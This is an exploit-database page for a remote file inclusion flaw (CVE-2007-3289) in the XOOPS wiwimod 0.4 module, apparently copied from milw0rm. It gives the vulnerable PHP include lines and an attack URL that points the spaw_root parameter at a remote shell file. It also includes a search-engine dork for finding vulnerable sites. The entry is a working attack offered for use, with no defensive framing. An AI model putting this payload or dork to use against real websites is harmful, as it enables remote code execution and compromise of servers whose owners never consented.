[] NeoSense
E X P L O I T S
title author type platform port cve id

XOOPS Module wiwimod 0.4 - Remote File Inclusion

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-06-19 
date_updated: 2016-10-05 
verified: 1 
codes: OSVDB-38473;CVE-2007-3289 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comXOOPS2_mod_wiwimod_0.4.0_xavier_jimenez.zip
# XOOPS Module WiwiMod v0.4 (spaw_root) RFI Vulnerability

# D.Script:

http://codigolivre.org.br/frs/download.php/1745/xoops2-mod_wiwimod_0.4_xavier_jimenez.zip

# V.Code :
      include $spaw_root.'config/spaw_control.config.php';
      include $spaw_root.'class/toolbars.class.php';
      include $spaw_root.'class/lang.class.php';

# In :
      /spaw/spaw_control.class.php

# Exploits:
      /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=Shell.txt?

#D0Rk:
      allinurl:/modules/wiwimod/


# Discovered by:
      GoLd_M = [Mahmood_ali]

# Homepage:
      http://www.Tryag.Com/cc

# Sp.Thanx To :
      Tryag-Team & Asb-May's Team

# milw0rm.com [2007-06-20]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.